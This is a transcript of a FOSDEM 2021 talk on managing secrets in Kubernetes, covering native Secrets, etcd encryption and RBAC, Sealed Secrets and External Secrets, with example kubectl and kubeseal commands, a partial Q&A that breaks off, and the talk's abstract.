The second way is to use the Kubernetes internals. Indeed, Kubernetes offers an option to store secrets within etcd. This might sound quite appealing, considering that this is an onboard solution, being the closest to the workloads that would use the secrets. This will also remove all the craziness of storing passwords within a deployment configuration or within a container image. Although there are a couple of things to know. First, the secret will not be encrypted; it will be encoded in base64, which is not really secure, and by default not many Kubernetes distributions come with an encrypted etcd. Anyone with Kubernetes access can retrieve the secrets. Also, secrets will live within the target cluster on which you deployed that specific secret and will not fit a multi-cluster scenario. So, is it a potential solution? Well, the answer to this question is still yes, if you consider the following recommendations. First, enable encryption at rest for etcd. Second, enable role-based access control rules, the famous RBAC, to restrict reading and writing secrets on the platform. And last, a personal recommendation: do not store any secrets for external services, like a database. The reason for that last personal recommendation is about containing a potential leak. If it happens, it will only concern a very reduced set of data within a specific cluster, which will definitely limit potential damage. So, what does it look like? Well, creating secrets from a Kubernetes perspective can be done in multiple ways. One of them is by using a secret resource file and applying it via kubectl (kube control). This is what you can see on the screen on the left side. So, we're using the command kubectl to generate the manifest for a secret. At that stage, we can apply that manifest to Kubernetes itself so that it's available for pods. On the right side, you have an overview of how to call the secrets that you just registered from a pod perspective, by using one of the methods, which is the environment variables that you can see here, being SECRET_USERNAME and SECRET_PASSWORD (see the short sketch below). So, if you're thinking about GitOps, this would be a perfect example, except that you would save your secrets within Git, meaning that you just published your secret in clear text or base64 encoded for anyone having access to your Git repository. Note that you can try this at home quite easily using minikube, for example, or any other similar lightweight Kubernetes distribution. The last option is about using an external solution. This option is about having a totally independent solution that would run outside or inside Kubernetes, or even in a hybrid mode. Such a decision will impact the actual availability of the solution towards single or multiple clusters, or even its use by non-Kubernetes workloads. Let's have a look at those solutions. From that list, which refers to HashiCorp Vault, CyberArk Conjur, Kiwis, Sealed Secrets and External Secrets, I will not have a look at the HashiCorp Vault and CyberArk solutions, as they have quite a good amount of collateral, being products aimed at enterprises. However, I would like to give a shout out to two projects, being Sealed Secrets from Bitnami and External Secrets from GoDaddy. I believe these are quite mature and interesting options when looking into an open source solution. Remember earlier, when discussing using a resource file saved within a Git repo, that this was not a good idea, because the secret would be publicly available in clear text or base64 encoded.
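For reference, here is a minimal sketch of the flow described above: generating a Secret manifest with kubectl, applying it, and consuming it from a pod through the SECRET_USERNAME and SECRET_PASSWORD environment variables. All names and values are illustrative, and the generated manifest is exactly the kind of file you should not push to a Git repository, since the values are only base64 encoded.

# Generate a Secret manifest without creating it yet, then apply it:
kubectl create secret generic db-credentials \
  --from-literal=username=admin \
  --from-literal=password='S3cr3t!' \
  --dry-run=client -o yaml > db-credentials.yaml
kubectl apply -f db-credentials.yaml

# Write a pod definition that consumes the Secret as environment variables:
cat <<'EOF' > secret-demo-pod.yaml
apiVersion: v1
kind: Pod
metadata:
  name: secret-demo
spec:
  containers:
  - name: app
    image: busybox
    command: ["sh", "-c", "echo $SECRET_USERNAME; sleep 3600"]
    env:
    - name: SECRET_USERNAME
      valueFrom:
        secretKeyRef:
          name: db-credentials
          key: username
    - name: SECRET_PASSWORD
      valueFrom:
        secretKeyRef:
          name: db-credentials
          key: password
EOF
kubectl apply -f secret-demo-pod.yaml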
Well, this is where Sealed Secrets from Bitnami embraces the GitOps concept and solves the clear text issue. Sealed Secrets is based on a client-server approach, having a controller deployed within the Kubernetes cluster and a CLI tool called kubeseal on the client side. It introduces one-way encrypted secrets that can be created by anyone, but can only be decrypted by the controller running on the Kubernetes cluster. This is based on the principle of public key cryptography, involving a public and a private key. Let's have a look at it. So, nothing too different from the previous example. On the left side, we have exactly the same creation of the manifest, and then we introduce kubeseal, which will check with the controller running on the Kubernetes platform for the certificate and encrypt the data. When the data is encrypted, we can apply that manifest towards the cluster. And at that stage, we have the output of the encrypted payload, which is on the right side. Not too different from what we have on the left side, except that this time it is not base64 anymore; it is real encryption (a short command-line sketch of this flow is shown further below). The last approach is to use External Secrets from GoDaddy. It provides an API extension to Kubernetes by adding the concept of external secrets from an API perspective, using a custom resource definition along with an embedded controller within the Kubernetes cluster, a bit like Sealed Secrets. Assuming that a KMS (key management service) is available internally, the idea is to leverage that existing KMS within your infrastructure instead of reinventing the wheel. Doing so will avoid retrieving secrets and exposing them to the world during the processing needed to make them available within the Kubernetes cluster. A controller is deployed within the Kubernetes cluster and will handle requests from pods to get secrets using the Kubernetes API. The controller will fetch the secrets from the KMS to safely store them within the Kubernetes cluster, and will decrypt them and expose them to the pods on demand. So, pretty good solutions so far, those two open source projects. But let's summarize what we discussed with some food for thought. The first thing is to understand the options to deal with secrets and how secrets work from a Kubernetes resource management standpoint. Then try to answer the questions about what is already available in your infrastructure and your commitment to cloud-native development using DevOps concepts like GitOps or infrastructure as code. The last question that comes to mind when looking at the existing solutions is why there is not much love for secret management, considering the design document dating from 2017. And finally, for everything you're trying to do in your infrastructure, just apply the KISS principle: keep it simple and a bit stupid at the end. Thank you for watching and have a good FOSDEM 2021. Hi everyone, so, to answer that, I never used it. Usually a KMS is a pretty good solution because it really gives you the opportunity to have a real solution to secure your secrets. And then it depends if there are already some modules available, from a Kubernetes or container perspective, to have a sidecar, for example, to fetch the secrets; that would be perfect. It looks like the solution you're mentioning is cloud native, so I would expect indeed a sidecar for this. I'm quite interested in it and I will look into this definitely. Oh, I don't know.
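Coming back to the Sealed Secrets workflow described in the talk above, a minimal sketch of the kubeseal flow could look as follows. It assumes the Sealed Secrets controller is already installed in the cluster, reuses the hypothetical db-credentials.yaml manifest from the earlier sketch, and flags may vary between kubeseal versions.

# Seal the plain Secret manifest with the cluster's public certificate.
# kubeseal contacts the sealed-secrets controller to fetch the certificate.
kubeseal --format yaml < db-credentials.yaml > sealed-db-credentials.yaml

# The SealedSecret manifest is safe to store in Git: only the controller,
# which holds the private key, can decrypt it back into a regular Secret.
kubectl apply -f sealed-db-credentials.yaml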
This is a pretty good question. So, not that many people, actually. This is something that we don't see much from a CI/CD workflow perspective. I was mentioning putting secrets in production; that's the only time I've seen it. And that was scary for the customer from a security standpoint at some point. But at the end of the day, it really is the concept of generating a password for the service, because they could not just have a well-known password that exists for years. But we knew that password at the time of the deployment and deployed that password on the different instances, so that each time you deploy a new version of the application or
With containers being deployed at scale on Kubernetes, there is more than ever a need to introduce proper Secrets management to address both internal and external services. While there are dozens of network-related open source projects, there is not much about the art of Secrets, and almost none are part of the Cloud Native Computing Foundation landscape. This talk provides an overview of the open source state of Secrets management. When deploying containers at scale by the hundreds or thousands, Secrets management is always one of the most difficult topics to take on. Kubernetes by itself doesn't provide a really secure solution, and other solutions are either pseudo open source solutions calling for budget to move to the Enterprise version, or calling for a true mental shift that scares Security Officers. This talk provides an overview of these projects and concepts: why they are nice but sometimes scary.